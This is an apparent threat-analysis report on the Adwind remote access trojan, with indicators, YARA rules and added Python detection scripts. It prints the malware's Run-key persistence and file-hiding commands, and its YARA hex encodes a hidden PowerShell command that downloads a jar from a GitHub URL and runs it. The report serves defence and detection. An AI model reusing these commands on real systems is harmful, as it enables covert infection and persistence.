REPORT

Information about the file paths, registry records, logs and all indicators of the Adwind malware, a type of Remote Access Trojan, has been analyzed and reported in detail.

CONTENTS

Introduction
Rapor.xlsx Document Analysis
Adwind.jar File Analysis
Adwind.jar Network Analysis
Solution Proposals
Yara Rule
Introduction
The developer of the RAT-type Adwind malware is a Mexico-based Spanish hacker who started selling the Java-based remote access tool (RAT) called "Frutas", the first member of the Adwind family, in early 2012. It was rebranded at least seven times in the following years and was released under the names Adwind, UnReCoM, AlienSpy, JSocket, JBifrost, UnknownRat and JConnectPro.
Between 2013 and 2016, different versions of Adwind were used in attacks against at least 443,000 private users and commercial and non-commercial organizations around the world.
Adwind RAT, which took that name in early 2013, was offered for sale via various communication channels such as Skype or e-mail. It was released at an initial price of $55, and it was announced that the price would rise to $100 as of February 15th. With an update in 2013, Android support was also added. Because of its many features and its ability to run on most platforms, it became a very popular tool in a short time. With this popularity, the developer of Adwind RAT opened a YouTube channel and shared tutorial videos on how to use Adwind RAT through it. Adwind RAT was used for the first time in a targeted attack in the Asia-Pacific region. In November 2013, the malware was renamed UNRECOM. This rebranded version of Adwind retained all of its old features.
In 2014, Adwind's source code leaked and became freely available online. In response to the leak, the "official" version of the Adwind Trojan was significantly upgraded and re-released as AlienSpy in October 2014. This version of the malware gained features such as sandbox detection, cryptographically secured communication with the control server, and automatic detection and disabling of antivirus programs.
Rapor.xlsx Document Analysis
File Name: Rapor.xlsx
MD5: 5ba62c034584b88e44b5364e4131671c
SHA1: b4a8dfe2eebaf436c021458e515baf39ed812740
SHA256: 9e61a8cf313337d2b72fc463164afc2e332fa26fda145c18fc6de6acd68af7db
Adwind malware first arrives on the system as an Excel document delivered by phishing attacks. The document is attached to e-mails with varying content. When the victim first opens it, an Excel sheet filled with meaningless characters appears together with the warning "you have to activate the content". After this warning, the Excel document requests permission for cmd.exe to run a script hidden in its sub-cells.
This script downloads the actual malicious code from GitHub and runs it without any user permission and without opening a console window on the screen. When we look at the hex values of the Excel document, this piece of code is visible.
This Excel document, our first malicious file, performs no harmful operation other than downloading the malicious code; its task is that of a dropper.
Adwind.jar File Analysis
The downloaded malicious file, adwind.jar, performs the actual malicious processes. First of all, we see that when it runs on the system it is obfuscated with Allatori, an obfuscation tool. Obfuscating itself makes it difficult for antivirus products and analysts to detect. It then performs some checks while running on the system: public IP detection and country identification over the network. After passing these checks, it starts its harmful activities on the system.
Firstly, it performs operations such as establishing persistence and providing information to the command and control servers by running commands in a shell. For this purpose, it changes the access rights of the directory where the Java program is installed on the system so that it can access it.
After obtaining these permissions, it adds itself to the startup entries so that it can start itself every time the computer is turned on. It places itself as 'Uninstall.Uninstaller' in the 'Uninstall' folder under the \AppData\Roaming directory of the user's home directory:
"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v JavaSun_Uninstall_00001_00002 /t REG_SZ /d \%ProgramFiles%\Java\jre1.8.0_251\bin\javaw.exe\ -jar \%AppData%\Uninstall\Uninstall.Uninstaller\ /f"
After adding itself to the startup entries, it uses the Windows tool attrib.exe on the directory it lives in: the "+h" parameter hides the directory from the user, "+r" marks it read-only to prevent changes to the file, and "+s" marks it as a system file.
attrib +s +h +r %AppData%\Uninstall\*.*
attrib +s +h +r %AppData%\Uninstall
After these steps, its persistence and access on the system are ensured.
As soon as it starts, the malware uses WMIC.exe to detect AV software running on the system.
After these steps, it also hides the ".Uninstall" directory in the user's home directory.
attrib +H %UserProfile%\.Uninstall
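The host-side chain described above (Excel spawning a shell, a hidden PowerShell download, the Run-key entry that launches javaw.exe from %AppData%, attrib hiding, and WMIC antivirus enumeration) can be turned into defensive signatures over process-creation records. The following is an added example written for this report, not code from the report or from the malware: the record shape, the rule names, the sample events and the WMIC query text are all constructed here (the report only says WMIC.exe is used to find AV software; the AntiVirusProduct class is an assumed way of doing that).

```python
"""
Added example; not code from the original report. Runs defensive signatures for
the Adwind host-side behaviours over constructed process-creation records.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass
class ProcEvent:
    """Constructed minimal shape of a process-creation record (e.g. Sysmon event ID 1)."""
    host: str
    parent: str    # parent executable name
    image: str     # launched executable name
    cmdline: str


def _cmd_has(e: ProcEvent, *needles: str) -> bool:
    """True when every needle occurs in the command line (case-insensitive)."""
    low = e.cmdline.lower()
    return all(n.lower() in low for n in needles)


RUN_KEY = r"\software\microsoft\windows\currentversion\run"


def office_spawns_shell(e: ProcEvent) -> bool:
    # Dropper stage: the Excel document asks cmd.exe to run the hidden script.
    return e.parent.lower() == "excel.exe" and e.image.lower() in ("cmd.exe", "powershell.exe")


def powershell_hidden_download(e: ProcEvent) -> bool:
    # Policy-bypassing, hidden-window PowerShell that fetches a file from the network.
    return e.image.lower() == "powershell.exe" and _cmd_has(e, "-executionpolicy bypass", "hidden", "downloadfile")


def runkey_javaw_from_appdata(e: ProcEvent) -> bool:
    # Run-key persistence whose payload is javaw.exe -jar <something under %AppData%>.
    return e.image.lower() == "reg.exe" and _cmd_has(e, "add", RUN_KEY, "javaw.exe", "-jar", "%appdata%")


def attrib_hide_appdata(e: ProcEvent) -> bool:
    # attrib +h on a path under %AppData% or the user profile (report: "+s +h +r" and "+H").
    return (e.image.lower() == "attrib.exe" and _cmd_has(e, "+h")
            and (_cmd_has(e, "%appdata%") or _cmd_has(e, "%userprofile%")))


def wmic_av_enumeration(e: ProcEvent) -> bool:
    # Assumed query text: the report only states that WMIC.exe is used to find AV software.
    return e.image.lower() == "wmic.exe" and _cmd_has(e, "antivirusproduct")


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    (f.__name__, f) for f in (office_spawns_shell, powershell_hidden_download,
                              runkey_javaw_from_appdata, attrib_hide_appdata, wmic_av_enumeration)
]


def triage(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """Return (host, rule name, command line) for every event that trips a rule."""
    return [(e.host, name, e.cmdline) for e in events for name, rule in RULES if rule(e)]


def summarize(events: List[ProcEvent]) -> Dict[str, List[str]]:
    """Map each host that tripped at least one rule to the sorted list of rule names."""
    hits: Dict[str, set] = defaultdict(set)
    for host, name, _ in triage(events):
        hits[host].add(name)
    return {host: sorted(names) for host, names in hits.items()}


# Constructed download command with a placeholder URL (the real one is in the report's YARA rule).
PS_DOWNLOAD = (r'''powershell -executionpolicy bypass -W Hidden -command '''
               r'''"(new-object System.Net.WebClient).DownloadFile('https://PLACEHOLDER.invalid/p.svg','%tmp%\p.jar')"''')

# Constructed sample: WS01 replays the chain from the report, WS02 shows benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent("WS01", "EXCEL.EXE", "cmd.exe", "cmd /c " + PS_DOWNLOAD),
    ProcEvent("WS01", "cmd.exe", "powershell.exe", PS_DOWNLOAD),
    ProcEvent("WS01", "cmd.exe", "reg.exe",
              r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v JavaSun_Uninstall_00001_00002 '
              r'/t REG_SZ /d "%ProgramFiles%\Java\jre1.8.0_251\bin\javaw.exe -jar %AppData%\Uninstall\Uninstall.Uninstaller" /f'),
    ProcEvent("WS01", "cmd.exe", "attrib.exe", r"attrib +s +h +r %AppData%\Uninstall\*.*"),
    ProcEvent("WS01", "cmd.exe", "attrib.exe", r"attrib +H %UserProfile%\.Uninstall"),
    ProcEvent("WS01", "cmd.exe", "wmic.exe", r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"),
    ProcEvent("WS02", "explorer.exe", "attrib.exe", r"attrib +r C:\Users\alice\Documents\report.docx"),
    ProcEvent("WS02", "msiexec.exe", "reg.exe",
              r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /d "C:\Program Files\OneDrive\OneDrive.exe /background" /f'),
    ProcEvent("WS02", "explorer.exe", "powershell.exe", "powershell -command Get-Date"),
]

if __name__ == "__main__":
    for host, rules in summarize(SAMPLE_EVENTS).items():
        print(host, rules)
```

Each rule keys on the executable image plus the command-line fragments the report documents, so a benign Run-key entry or a plain `attrib +r` does not fire; the combination of several rules on one host within a short time is the strong signal, which is what `summarize` surfaces.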
Adwind.jar Network Analysis
First, the malware uses Amazon's servers to obtain the victim system's public IP address; it learns the IP address of the victim system via the address "http://checkip[.]amazonaws[.]com". Using the API of the "ipinfo[.]io" site, it determines the country where the victim is located. The malware's target is Turkey: it only continues when the country code is TR and does not operate outside it.
After these operations, it carries out its harmful activities on the system, and it has been determined that it communicates with the command and control server at the domain 21736[.]xyz.
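The network sequence just described (public-IP lookup, then geolocation lookup, then contact with a previously unseen domain, all from one host within seconds of start-up) is itself detectable in DNS logs, independently of the specific C2 domain. The following is an added example written for this report, not code from the report: the log format, host names, time window and allowlist are constructed; the two lookup services and the final domain are the ones the report names.

```python
"""
Added example; not code from the original report. Correlates DNS query logs for
the report's start-up pattern: public-IP lookup -> geolocation lookup -> unknown domain.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterator, List, Tuple

# Constructed log format: "<UTC timestamp> <host> <query type> <query name>".
LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<qtype>\S+)\s+(?P<qname>\S+)$")

PUBLIC_IP_SERVICES = {"checkip.amazonaws.com"}   # report: used to learn the victim's public IP
GEOLOCATION_SERVICES = {"ipinfo.io"}             # report: used to learn the victim's country
ALLOWLIST = {"updates.example.com"}              # constructed: domains known to be legitimate
WINDOW = timedelta(seconds=120)                  # constructed: the chain runs right after start-up


def parse(log: str) -> Iterator[Tuple[datetime, str, str]]:
    """Yield (timestamp, host, query name) for A/AAAA queries; skip malformed lines."""
    for line in log.splitlines():
        m = LINE.match(line.strip())
        if not m or m["qtype"] not in ("A", "AAAA"):
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m["host"], m["qname"].lower().rstrip(".")


def detect(log: str, window: timedelta = WINDOW) -> List[Dict[str, str]]:
    """Alert when a host queries a public-IP service, then a geolocation service,
    then a domain outside the allowlist, all within `window` of the first query."""
    per_host: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, host, qname in parse(log):
        per_host[host].append((ts, qname))

    alerts: List[Dict[str, str]] = []
    for host, queries in per_host.items():
        queries.sort()
        for i, (t0, q0) in enumerate(queries):
            if q0 not in PUBLIC_IP_SERVICES:
                continue
            geo_seen = False
            for t, q in queries[i + 1:]:
                if t - t0 > window:
                    break                      # chain did not complete in time
                if q in GEOLOCATION_SERVICES:
                    geo_seen = True
                elif geo_seen and q not in ALLOWLIST and q not in PUBLIC_IP_SERVICES:
                    alerts.append({"host": host, "first_seen": t0.isoformat(), "candidate_c2": q})
                    break                      # one alert per chain start
    return alerts


# Constructed sample log. WS01 replays the chain from the report; WS02 performs the
# same two lookups 20 minutes apart; WS03 never asks for its public IP.
SAMPLE_LOG = """\
2020-05-13T09:00:01Z WS01 A checkip.amazonaws.com
2020-05-13T09:00:02Z WS01 A ipinfo.io
2020-05-13T09:00:05Z WS01 A 21736.xyz
2020-05-13T09:10:00Z WS02 A checkip.amazonaws.com
2020-05-13T09:30:00Z WS02 A ipinfo.io
2020-05-13T09:30:01Z WS02 A updates.example.com
2020-05-13T11:00:00Z WS03 A ipinfo.io
2020-05-13T11:00:03Z WS03 A updates.example.com
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The behavioural rule fires on WS01 only; it complements a plain indicator match on 21736[.]xyz rather than replacing it, and the window should be tuned to how quickly the chain completes in the environment being monitored.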
Solution Proposals
These solutions can prevent the Adwind RAT Trojan from infecting and damaging the system.
Yara Rule
import "hash"

rule Rapor: xlsx
{
    meta:
        description = "Adwind RAT Trojan"
        first_date = "13.05.2020"
        report_date = "18.07.2020"
        file_name = "Rapor.xlsx"
    strings:
        $s1 = {63 6D 64 03 2F 63 20 70 6F 77 65 72 73 68 65 6C 6C 20 2D 65 78 65 63 75 74
               69 6F 6E 70 6F 6C 69 63 79 20 62 79 70 61 73 73 20 2D 57 20 48 69 64 64 65 6E 20 2D 63 6F 6D 6D
               61 6E 64 20 22 26 20 7B 20 28 6E 65 77 2D 6F 62 6A 65 63 74 20 53 79 73 74 65 6D 2E 4E 65 74 2E
               57 65 62 43 6C 69 65 6E 74 29 2E 44 6F 77 6E 6C 6F 61 64 46 69 6C 65 28 5C 22 68 74 74 70 73 3A
               2F 2F 72 61 77 2E 67 69 74 68 75 62 75 73 65 72 63 6F 6E 74 65 6E 74 2E 63 6F 6D 2F 35 33 30 38
               36 38 32 2F 34 79 62 61 38 34 34 34 6D 74 63 72 61 31 31 2F 67 68 2D 70 61 67 65 73 2F 77 75 63
               67 79 33 6A 65 63 77 67 70 76 2E 73 76 67 5C 22 20 2C 5C 22 20 25 74 6D 70 25 5C 5C 41 43 4A 54
               55 2E 6A 61 72 5C 22 29 20 7D 22 20 26 20 25 74 6D 70 25 5C 5C 41 43 4A 54 55 2E 6A 61 72 23 00
               15 00 E2 7F 00 00 00 00 0E 59 32 31 35 49 4E 59 46 59 52 46 51 50 45 55}
        $s2 = "https://raw.githubusercontent.com/5308682/4yba8444mtcra11/gh-pages/wucgy3jecwgpv.svg"
    condition:
        hash.md5(0,filesize) == "5ba62c034584b88e44b5364e4131671c" or $s1 or $s2
}

rule Adwind: java
{
    meta:
        description = "Adwind RAT Trojan"
        first_date = "13.05.2020"
        report_date = "18.07.2020"
        file_name = "Adwind.jar"
    strings:
        $s1 = "16245"
        $s2 = "A$D.class"
        $s3 = "A.class"
        $s4 = "B.class"
        $s5 = "C.class"
        $s6 = "D$A.class"
        $s7 = "D.class"
        $s8 = "u2Br3cvUkb"
        $s9 = "c.class"
        $s10 = "n.class"
        $s11 = "mny\\zsh"
    condition:
        hash.md5(0,filesize) == "8961392f55bdbfaa48c906ab5594afe3" or all of them
}
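The "Adwind: java" rule above relies on short strings such as "A$D.class" that look like they would be hidden inside an obfuscated, compressed archive. They are not: a .jar is a ZIP file, and member names are stored in plaintext in the local file headers and the central directory, so YARA sees them in the raw bytes even though the class bodies are deflated. Strings that live inside a member's content, by contrast, are only visible if that member is stored uncompressed. The following is an added example written for this report, not code from the report or the yara tool: it re-implements the rule's condition (known MD5, or all eleven strings present) in plain Python over constructed in-memory archives; the MD5 is the one the rule carries, and every archive built here is constructed.

```python
"""
Added example; not code from the original report. Re-implements the report's
'Adwind: java' YARA condition and shows which of its strings survive ZIP compression.
"""
import hashlib
import io
import zipfile
from typing import Dict, List

KNOWN_MD5 = "8961392f55bdbfaa48c906ab5594afe3"   # from the report's YARA rule

# The rule's $s1..$s11 as raw byte patterns. YARA's "mny\\zsh" is the 7-byte literal mny\zsh.
RULE_STRINGS: List[bytes] = [
    b"16245", b"A$D.class", b"A.class", b"B.class", b"C.class", b"D$A.class",
    b"D.class", b"u2Br3cvUkb", b"c.class", b"n.class", b"mny\\zsh",
]
CLASS_MEMBERS = [s.decode() for s in RULE_STRINGS if s.endswith(b".class")]


def scan_jar(data: bytes) -> Dict[str, object]:
    """Apply the rule's condition to the raw bytes (what YARA sees) and list the archive members."""
    md5 = hashlib.md5(data).hexdigest()
    raw_hits = [s.decode() for s in RULE_STRINGS if s in data]
    members: List[str] = []
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            members = zf.namelist()
    return {
        "md5": md5,
        "raw_hits": raw_hits,
        "members": members,
        "matches_rule": md5 == KNOWN_MD5 or len(raw_hits) == len(RULE_STRINGS),
    }


def build_sample_jar(class_names: List[str], resource_stored: bool) -> bytes:
    """Constructed .jar: placeholder class files plus one resource carrying the non-class strings.
    The class files are always deflated; the resource is stored or deflated as requested."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        for name in class_names:
            # 0xCAFEBABE magic followed by filler; not a real class body.
            zf.writestr(name, b"\xca\xfe\xba\xbe" + b"\x00" * 28)
        resource = b"16245\nu2Br3cvUkb\nmny\\zsh\n"
        zf.writestr("resources/config.dat", resource,
                    compress_type=zipfile.ZIP_STORED if resource_stored else zipfile.ZIP_DEFLATED)
    return buf.getvalue()


if __name__ == "__main__":
    for label, jar in (("stored resource", build_sample_jar(CLASS_MEMBERS, True)),
                       ("deflated resource", build_sample_jar(CLASS_MEMBERS, False)),
                       ("unrelated jar", build_sample_jar(["Main.class"], True))):
        result = scan_jar(jar)
        print(label, result["matches_rule"], sorted(result["raw_hits"]))
```

With the resource stored, all eleven strings are found and the rule's "all of them" branch matches; with the same resource deflated, the member list is identical but the three content strings disappear from the raw bytes and the rule no longer matches. That is the caveat to keep in mind when writing content-based strings for .jar samples: prefer member names, or unpack the archive before scanning.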